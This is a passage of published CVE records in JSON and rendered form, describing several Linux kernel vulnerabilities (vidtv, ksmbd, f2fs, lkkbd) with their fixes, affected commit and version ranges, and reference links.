"url": "https://git.kernel.org/stable/c/ac92151ff2494130d9fc686055d6bbb9743a673e"
},
{
"url": "https://git.kernel.org/stable/c/b91e6aafe8d356086cc621bc03e35ba2299e4788"
}
],
"title": "media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68819",
"datePublished": "2026-01-13T15:29:22.695Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:23.950Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68808 (GCVE-0-2025-68808)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
media: vidtv: initialize local pointers upon transfer of memory ownership
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: vidtv: initialize local pointers upon transfer of memory ownership
vidtv_channel_si_init() creates a temporary list (program, service, event)
and ownership of the memory itself is transferred to the PAT/SDT/EIT
tables through vidtv_psi_pat_program_assign(),
vidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().
The problem here is that the local pointer where the memory ownership
transfer was completed is not initialized to NULL. This causes the
vidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and
in the flow that jumps to free_eit, the memory that was freed by
vidtv_psi_*_table_destroy() can be accessed again by
vidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it
is freed once again.
Therefore, to prevent use-after-free and double-free vulnerability,
local pointers must be initialized to NULL when transferring memory
ownership.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
3be8037960bccd13052cfdeba8805ad785041d70 , < c342e294dac4988c8ada759b2f057246e48c5108
(git)
Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 12ab6ebb37789b84073e83e4d9b14a5e0d133323 (git) Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e (git) Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8 (git) Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < a69c7fd603bf5ad93177394fbd9711922ee81032 (git) Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 30f4d4e5224a9e44e9ceb3956489462319d804ce (git) Affected: 3be8037960bccd13052cfdeba8805ad785041d70 , < 98aabfe2d79f74613abc2b0b1cef08f97eaf5322 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/test-drivers/vidtv/vidtv_channel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c342e294dac4988c8ada759b2f057246e48c5108",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "12ab6ebb37789b84073e83e4d9b14a5e0d133323",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "a69c7fd603bf5ad93177394fbd9711922ee81032",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "30f4d4e5224a9e44e9ceb3956489462319d804ce",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
},
{
"lessThan": "98aabfe2d79f74613abc2b0b1cef08f97eaf5322",
"status": "affected",
"version": "3be8037960bccd13052cfdeba8805ad785041d70",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/test-drivers/vidtv/vidtv_channel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:16.763Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c342e294dac4988c8ada759b2f057246e48c5108"
},
{
"url": "https://git.kernel.org/stable/c/12ab6ebb37789b84073e83e4d9b14a5e0d133323"
},
{
"url": "https://git.kernel.org/stable/c/3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e"
},
{
"url": "https://git.kernel.org/stable/c/fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8"
},
{
"url": "https://git.kernel.org/stable/c/a69c7fd603bf5ad93177394fbd9711922ee81032"
},
{
"url": "https://git.kernel.org/stable/c/30f4d4e5224a9e44e9ceb3956489462319d804ce"
},
{
"url": "https://git.kernel.org/stable/c/98aabfe2d79f74613abc2b0b1cef08f97eaf5322"
}
],
"title": "media: vidtv: initialize local pointers upon transfer of memory ownership",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68808",
"datePublished": "2026-01-13T15:29:15.164Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:16.763Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68786 (GCVE-0-2025-68786)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
ksmbd: skip lock-range check on equal size to avoid size==0 underflow
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: skip lock-range check on equal size to avoid size==0 underflow
When size equals the current i_size (including 0), the code used to call
check_lock_range(filp, i_size, size - 1, WRITE), which computes `size - 1`
and can underflow for size==0. Skip the equal case.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
f44158485826c076335d6860d35872271a83791d , < 52fcbb92e0d3acfd1448b2a43b6595d540da5295
(git)
Affected: f44158485826c076335d6860d35872271a83791d , < da29cd197246c85c0473259f1cad897d9d28faea (git) Affected: f44158485826c076335d6860d35872271a83791d , < a6f4cfa3783804336491e0edcb250c25f9b59d33 (git) Affected: f44158485826c076335d6860d35872271a83791d , < 571204e4758a528fbd67330bd4b0dfbdafb33dd8 (git) Affected: f44158485826c076335d6860d35872271a83791d , < 5d510ac31626ed157d2182149559430350cf2104 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "52fcbb92e0d3acfd1448b2a43b6595d540da5295",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "da29cd197246c85c0473259f1cad897d9d28faea",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "a6f4cfa3783804336491e0edcb250c25f9b59d33",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "571204e4758a528fbd67330bd4b0dfbdafb33dd8",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "5d510ac31626ed157d2182149559430350cf2104",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: skip lock-range check on equal size to avoid size==0 underflow\n\nWhen size equals the current i_size (including 0), the code used to call\ncheck_lock_range(filp, i_size, size - 1, WRITE), which computes `size - 1`\nand can underflow for size==0. Skip the equal case."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:31.484Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/52fcbb92e0d3acfd1448b2a43b6595d540da5295"
},
{
"url": "https://git.kernel.org/stable/c/da29cd197246c85c0473259f1cad897d9d28faea"
},
{
"url": "https://git.kernel.org/stable/c/a6f4cfa3783804336491e0edcb250c25f9b59d33"
},
{
"url": "https://git.kernel.org/stable/c/571204e4758a528fbd67330bd4b0dfbdafb33dd8"
},
{
"url": "https://git.kernel.org/stable/c/5d510ac31626ed157d2182149559430350cf2104"
}
],
"title": "ksmbd: skip lock-range check on equal size to avoid size==0 underflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68786",
"datePublished": "2026-01-13T15:28:59.578Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-14T08:51:31.484Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71069 (GCVE-0-2025-71069)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
f2fs: invalidate dentry cache on failed whiteout creation
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: invalidate dentry cache on failed whiteout creation
F2FS can mount filesystems with corrupted directory depth values that
get runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT
operations are performed on such directories, f2fs_rename performs
directory modifications (updating target entry and deleting source
entry) before attempting to add the whiteout entry via f2fs_add_link.
If f2fs_add_link fails due to the corrupted directory structure, the
function returns an error to VFS, but the partial directory
modifications have already been committed to disk. VFS assumes the
entire rename operation failed and does not update the dentry cache,
leaving stale mappings.
In the error path, VFS does not call d_move() to update the dentry
cache. This results in new_dentry still pointing to the old inode
(new_inode) which has already had its i_nlink decremented to zero.
The stale cache causes subsequent operations to incorrectly reference
the freed inode.
This causes subsequent operations to use cached dentry information that
no longer matches the on-disk state. When a second rename targets the
same entry, VFS attempts to decrement i_nlink on the stale inode, which
may already have i_nlink=0, triggering a WARNING in drop_nlink().
Example sequence:
1. First rename (RENAME_WHITEOUT): file2 → file1
- f2fs updates file1 entry on disk (points to inode 8)
- f2fs deletes file2 entry on disk
- f2fs_add_link(whiteout) fails (corrupted directory)
- Returns error to VFS
- VFS does not call d_move() due to error
- VFS cache still has: file1 → inode 7 (stale!)
- inode 7 has i_nlink=0 (already decremented)
2. Second rename: file3 → file1
- VFS uses stale cache: file1 → inode 7
- Tries to drop_nlink on inode 7 (i_nlink already 0)
- WARNING in drop_nlink()
Fix this by explicitly invalidating old_dentry and new_dentry when
f2fs_add_link fails during whiteout creation. This forces VFS to
refresh from disk on subsequent operations, ensuring cache consistency
even when the rename partially succeeds.
Reproducer:
1. Mount F2FS image with corrupted i_current_depth
2. renameat2(file2, file1, RENAME_WHITEOUT)
3. renameat2(file3, file1, 0)
4. System triggers WARNING in drop_nlink()
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 7f2bae0c881aa1e0a6318756df692cc13df2cc83
(git)
Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 3d95ed8cf980fdfa67a3ab9491357521ae576168 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < c89845fae250efdd59c1d4ec60e9e1c652cee4b6 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 0dde30753c1e8648665dbe069d814e540ce2fd37 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < d33f89b34aa313f50f9a512d58dd288999f246b0 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/namei.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7f2bae0c881aa1e0a6318756df692cc13df2cc83",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "3d95ed8cf980fdfa67a3ab9491357521ae576168",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "c89845fae250efdd59c1d4ec60e9e1c652cee4b6",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "0dde30753c1e8648665dbe069d814e540ce2fd37",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
},
{
"lessThan": "d33f89b34aa313f50f9a512d58dd288999f246b0",
"status": "affected",
"version": "7e01e7ad746bc8198a8b46163ddc73a1c7d22339",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/namei.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: invalidate dentry cache on failed whiteout creation\n\nF2FS can mount filesystems with corrupted directory depth values that\nget runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT\noperations are performed on such directories, f2fs_rename performs\ndirectory modifications (updating target entry and deleting source\nentry) before attempting to add the whiteout entry via f2fs_add_link.\n\nIf f2fs_add_link fails due to the corrupted directory structure, the\nfunction returns an error to VFS, but the partial directory\nmodifications have already been committed to disk. VFS assumes the\nentire rename operation failed and does not update the dentry cache,\nleaving stale mappings.\n\nIn the error path, VFS does not call d_move() to update the dentry\ncache. This results in new_dentry still pointing to the old inode\n(new_inode) which has already had its i_nlink decremented to zero.\nThe stale cache causes subsequent operations to incorrectly reference\nthe freed inode.\n\nThis causes subsequent operations to use cached dentry information that\nno longer matches the on-disk state. When a second rename targets the\nsame entry, VFS attempts to decrement i_nlink on the stale inode, which\nmay already have i_nlink=0, triggering a WARNING in drop_nlink().\n\nExample sequence:\n1. First rename (RENAME_WHITEOUT): file2 \u2192 file1\n - f2fs updates file1 entry on disk (points to inode 8)\n - f2fs deletes file2 entry on disk\n - f2fs_add_link(whiteout) fails (corrupted directory)\n - Returns error to VFS\n - VFS does not call d_move() due to error\n - VFS cache still has: file1 \u2192 inode 7 (stale!)\n - inode 7 has i_nlink=0 (already decremented)\n\n2. Second rename: file3 \u2192 file1\n - VFS uses stale cache: file1 \u2192 inode 7\n - Tries to drop_nlink on inode 7 (i_nlink already 0)\n - WARNING in drop_nlink()\n\nFix this by explicitly invalidating old_dentry and new_dentry when\nf2fs_add_link fails during whiteout creation. This forces VFS to\nrefresh from disk on subsequent operations, ensuring cache consistency\neven when the rename partially succeeds.\n\nReproducer:\n1. Mount F2FS image with corrupted i_current_depth\n2. renameat2(file2, file1, RENAME_WHITEOUT)\n3. renameat2(file3, file1, 0)\n4. System triggers WARNING in drop_nlink()"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:30.946Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7f2bae0c881aa1e0a6318756df692cc13df2cc83"
},
{
"url": "https://git.kernel.org/stable/c/3d95ed8cf980fdfa67a3ab9491357521ae576168"
},
{
"url": "https://git.kernel.org/stable/c/64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb"
},
{
"url": "https://git.kernel.org/stable/c/3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5"
},
{
"url": "https://git.kernel.org/stable/c/c89845fae250efdd59c1d4ec60e9e1c652cee4b6"
},
{
"url": "https://git.kernel.org/stable/c/0dde30753c1e8648665dbe069d814e540ce2fd37"
},
{
"url": "https://git.kernel.org/stable/c/d33f89b34aa313f50f9a512d58dd288999f246b0"
}
],
"title": "f2fs: invalidate dentry cache on failed whiteout creation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71069",
"datePublished": "2026-01-13T15:31:23.948Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-19T12:19:30.946Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71073 (GCVE-0-2025-71073)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
Input: lkkbd - disable pending work before freeing device
Summary
In the Linux kernel, the following vulnerability has been resolved:
Input: lkkbd - disable pending work before freeing device
lkkbd_interrupt() schedules lk->tq via schedule_work(), and the work
handler lkkbd_reinit() dereferences the lkkbd structure and its
serio/input_dev fields.
lkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd
structure without preventing the reinit work from being queued again
until serio_close() returns. This can allow the work handler to run
after the structure has been freed, leading to a potential use-after-free.
Use disable_work_sync() instead of cancel_work_sync() to ensure the
reinit work cannot be re-queued, and call it both in lkkbd_disconnect()
and in lkkbd_connect() error paths after serio_open().
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 3a7cd1397c209076c371d53bf39a55c138f62342
(git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < cffc4e29b1e2d44ab094cf142d7c461ff09b9104 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/input/keyboard/lkkbd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3a7cd1397c209076c371d53bf39a55c138f62342",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cffc4e29b1e2d44ab094cf142d7c461ff09b9104",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/input/keyboard/lkkbd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk-\u003etq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open()."
}
],
"providerMetadata": {
